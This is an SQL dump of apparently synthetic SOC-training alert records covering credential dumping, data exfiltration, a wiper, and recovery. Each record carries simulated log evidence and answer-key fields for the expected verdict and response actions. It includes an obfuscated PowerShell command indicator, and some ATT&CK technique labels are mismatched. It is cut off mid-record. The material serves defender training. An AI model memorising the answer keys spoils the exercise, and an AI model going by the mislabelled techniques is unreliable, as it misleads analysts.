(374, 'Credential Dumping Activity Spotted', 'high', 'Security Information and Event Management (SIEM)', 'An advanced attack has been identified where the attackers have deployed a credential dumping tool to extract passwords from memory, potentially to escalate privileges within the network. The activity was traced back to a specific host within the internal network, and network traffic analysis confirmed communication with a known malicious IP.', 'Credential Access', 'T1003.001 - OS Credential Dumping: LSASS Memory', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:22:35Z\",\"event_type\":\"credential_dumping\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"185.143.221.45\",\"file_name\":\"lsass_dump.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"administrator\",\"process_name\":\"lsass.exe\",\"detected_tool\":\"Mimikatz\",\"network_traffic\":{\"bytes_sent\":2048,\"bytes_received\":1024,\"protocol\":\"HTTP\"}}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.143.221.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with credential dumping activities\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"lsass_dump.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint_detection\",\"verdict\":\"suspicious\",\"details\":\"File name commonly associated with credential dumping attacks\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash linked to Mimikatz 
malware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Privileged user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:35Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.143.221.45\\\",\\\"file_name\\\":\\\"lsass_dump.exe\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"administrator\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"detected_tool\\\":\\\"Mimikatz\\\",\\\"network_traffic\\\":{\\\"bytes_sent\\\":2048,\\\"bytes_received\\\":1024,\\\"protocol\\\":\\\"HTTP\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:18.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:35Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.143.221.45\\\",\\\"file_name\\\":\\\"lsass_dump.exe\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"administrator\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"detected_tool\\\":\\\"Mimikatz\\\",\\\"network_traffic\\\":{\\\"bytes_sent\\\":2048,\\\"bytes_received\\\":1024,\\\"protocol\\\":\\\"HTTP\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:18.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:35Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.143.221.45\\\",\\\"file_name\\\":\\\"lsass_dump.exe\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"administrator\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"detected_tool\\\":\\\"Mimikatz\\\",\\\"network_traffic\\\":{\\\"bytes_sent\\\":2048,\\\"bytes_received\\\":1024,\\\"protocol\\\":\\\"HTTP\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:18.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:35Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.143.221.45\\\",\\\"file_name\\\":\\\"lsass_dump.exe\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"administrator\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"detected_tool\\\":\\\"Mimikatz\\\",\\\"network_traffic\\\":{\\\"bytes_sent\\\":2048,\\\"bytes_received\\\":1024,\\\"protocol\\\":\\\"HTTP\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:18.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:35Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.143.221.45\\\",\\\"file_name\\\":\\\"lsass_dump.exe\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"administrator\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"detected_tool\\\":\\\"Mimikatz\\\",\\\"network_traffic\\\":{\\\"bytes_sent\\\":2048,\\\"bytes_received\\\":1024,\\\"protocol\\\":\\\"HTTP\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(375, 'File Transfer Activity to External Server', 'critical', 'Data Loss Prevention (DLP) System', 'Sensitive information begins to flow out of the network, sent to an external server under the attackers\' control. Advanced techniques are being utilized to exfiltrate data.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 ', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"dlp-20231012-001\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_sha256\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"file_name\":\"financial_reports_q3_2023.xlsx\",\"transfer_protocol\":\"HTTPS\",\"transfer_size\":\"15MB\",\"action_taken\":\"Alert Triggered\"}', '2026-01-03 23:52:02', '2026-02-17 05:28:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Lookup\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory Service\",\"verdict\":\"clean\",\"details\":\"Username of employee John Doe.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash with multiple detections as potential data exfiltration 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"financial_reports_q3_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal File Classification System\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive financial data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.971Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-001\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_sha256\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"file_name\\\":\\\"financial_reports_q3_2023.xlsx\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"action_taken\\\":\\\"Alert Triggered\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.971Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-001\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_sha256\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"file_name\\\":\\\"financial_reports_q3_2023.xlsx\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"action_taken\\\":\\\"Alert 
Triggered\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.971Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-001\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_sha256\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"file_name\\\":\\\"financial_reports_q3_2023.xlsx\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"action_taken\\\":\\\"Alert Triggered\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.971Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-001\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_sha256\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"file_name\\\":\\\"financial_reports_q3_2023.xlsx\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"action_taken\\\":\\\"Alert Triggered\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.971Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"event_id\\\":\\\"dlp-20231012-001\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_sha256\\\":\\\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\\\",\\\"file_name\\\":\\\"financial_reports_q3_2023.xlsx\\\",\\\"transfer_protocol\\\":\\\"HTTPS\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"action_taken\\\":\\\"Alert Triggered\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(376, 'Wiper Logic Execution Detected', 'critical', 'Endpoint Detection and Response (EDR)', 'As the operation nears its climax, the wiper logic is activated, threatening to erase critical data under the guise of a ransomware attack. The EDR detected the execution of a known wiper malware file on the endpoint, which matches with advanced threat patterns.', 'Impact', 'T1485: Data Destruction', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T03:45:12Z\",\"event_type\":\"process_execution\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"CORP-WIN10-07\",\"process_name\":\"wiper_exe_activated.exe\",\"process_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"initiating_user\":\"jdoe\",\"attacker_ip\":\"185.92.220.45\",\"attack_command\":\"wiper_exe_activated.exe /silent\",\"attacker_domain\":\"malicious-domain.com\",\"detection_method\":\"EDR heuristic analysis\"}', '2026-01-03 23:52:02', '2026-02-17 05:28:38', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known wiper malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain used by attacker for command and 
control.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"wiper_exe_activated.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Filename of the wiper malware detected on endpoint.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Employee account involved in the incident.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(377, 'Forensic Artifact Recovery Initiated', 'high', 'Incident Response Tools', 'The incident response team has initiated recovery of forensic artifacts to preserve crucial evidence. The operation is aimed at understanding the attack vectors and preventing future occurrences. Advanced techniques were used to collect and analyze data from compromised systems.', 'Containment', 'T1113 - Screen Capture', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"IR-20231015-0023\",\"source_ip\":\"192.168.1.15\",\"detected_malware\":{\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"malicious_tool.exe\"},\"attacker_ip\":\"203.0.113.45\",\"user\":\"compromised_user\",\"forensic_artifacts\":[{\"type\":\"memory_dump\",\"filename\":\"memdump_20231015.raw\"},{\"type\":\"disk_image\",\"filename\":\"disk_image_20231015.img\"}],\"action\":\"artifact_recovery_initiated\",\"status\":\"success\"}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address assigned to compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Known malicious hash associated with advanced persistent threat.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known threat actor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"malicious\",\"details\":\"Detected as part of the ongoing investigation into the 
breach.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"suspicious\",\"details\":\"User account exhibiting unusual activity patterns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'IR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"IR-20231015-0023\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"detected_malware\\\":{\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"forensic_artifacts\\\":[{\\\"type\\\":\\\"memory_dump\\\",\\\"filename\\\":\\\"memdump_20231015.raw\\\"},{\\\"type\\\":\\\"disk_image\\\",\\\"filename\\\":\\\"disk_image_20231015.img\\\"}],\\\"action\\\":\\\"artifact_recovery_initiated\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"IR-20231015-0023\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"detected_malware\\\":{\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"forensic_artifacts\\\":[{\\\"type\\\":\\\"memory_dump\\\",\\\"filename\\\":\\\"memdump_20231015.raw\\\"},{\\\"type\\\":\\\"disk_image\\\",\\\"filename\\\":\\\"disk_image_20231015.img\\\"}],\\\"action\\\":\\\"artifact_recovery_initiated\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"IR-20231015-0023\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"detected_malware\\\":{\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"forensic_artifacts\\\":[{\\\"type\\\":\\\"memory_dump\\\",\\\"filename\\\":\\\"memdump_20231015.raw\\\"},{\\\"type\\\":\\\"disk_image\\\",\\\"filename\\\":\\\"disk_image_20231015.img\\\"}],\\\"action\\\":\\\"artifact_recovery_initiated\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"IR-20231015-0023\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"detected_malware\\\":{\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"forensic_artifacts\\\":[{\\\"type\\\":\\\"memory_dump\\\",\\\"filename\\\":\\\"memdump_20231015.raw\\\"},{\\\"type\\\":\\\"disk_image\\\",\\\"filename\\\":\\\"disk_image_20231015.img\\\"}],\\\"action\\\":\\\"artifact_recovery_initiated\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.972Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"IR-20231015-0023\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"detected_malware\\\":{\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\"},\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"forensic_artifacts\\\":[{\\\"type\\\":\\\"memory_dump\\\",\\\"filename\\\":\\\"memdump_20231015.raw\\\"},{\\\"type\\\":\\\"disk_image\\\",\\\"filename\\\":\\\"disk_image_20231015.img\\\"}],\\\"action\\\":\\\"artifact_recovery_initiated\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(378, 'Mitigation and Remediation Measures Implemented', 'medium', 'System Recovery Logs', 'The recovery team has successfully deployed remediation measures to neutralize the threat and restore affected systems. Mitigation strategies included blocking identified malicious IP addresses and resetting credentials for compromised user accounts.', 'Recovery', 'T1556 - Credentials from Password Stores', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T09:23:45Z\",\"event_id\":\"RECOVERY-20231015-0001\",\"source\":\"system_recovery\",\"action\":\"remediation_implemented\",\"affected_systems\":[{\"hostname\":\"server1.internal.network\",\"internal_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.15\",\"malicious_ip\":\"198.51.100.34\",\"compromised_user\":\"j.doe\",\"affected_files\":[{\"filename\":\"malicious_payload.exe\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\"}],\"remediation_actions\":[\"blocked_ip\",\"reset_credentials\",\"removed_malicious_files\"]}]}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelFeed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAudit\",\"verdict\":\"internal\",\"details\":\"User account had unauthorized access attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.974Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T09:23:45Z\\\",\\\"event_id\\\":\\\"RECOVERY-20231015-0001\\\",\\\"source\\\":\\\"system_recovery\\\",\\\"action\\\":\\\"remediation_implemented\\\",\\\"affected_systems\\\":[{\\\"hostname\\\":\\\"server1.internal.network\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.15\\\",\\\"malicious_ip\\\":\\\"198.51.100.34\\\",\\\"compromised_user\\\":\\\"j.doe\\\",\\\"affected_files\\\":[{\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\"}],\\\"remediation_actions\\\":[\\\"blocked_ip\\\",\\\"reset_credentials\\\",\\\"removed_malicious_files\\\"]}]}\"},{\"timestamp\":\"2026-02-01T20:31:18.974Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T09:23:45Z\\\",\\\"event_id\\\":\\\"RECOVERY-20231015-0001\\\",\\\"source\\\":\\\"system_recovery\\\",\\\"action\\\":\\\"remediation_implemented\\\",\\\"affected_systems\\\":[{\\\"hostname\\\":\\\"server1.internal.network\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.15\\\",\\\"malicious_ip\\\":\\\"198.51.100.34\\\",\\\"compromised_user\\\":\\\"j.doe\\\",\\\"affected_files\\\":[{\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\"}],\\\"remediation_actions\\\":[\\\"blocked_ip\\\",\\\"reset_credentials\\\",\\\"removed_malicious_files\\\"]}]}\"},{\"timestamp\":\"2026-02-01T20:30:18.974Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 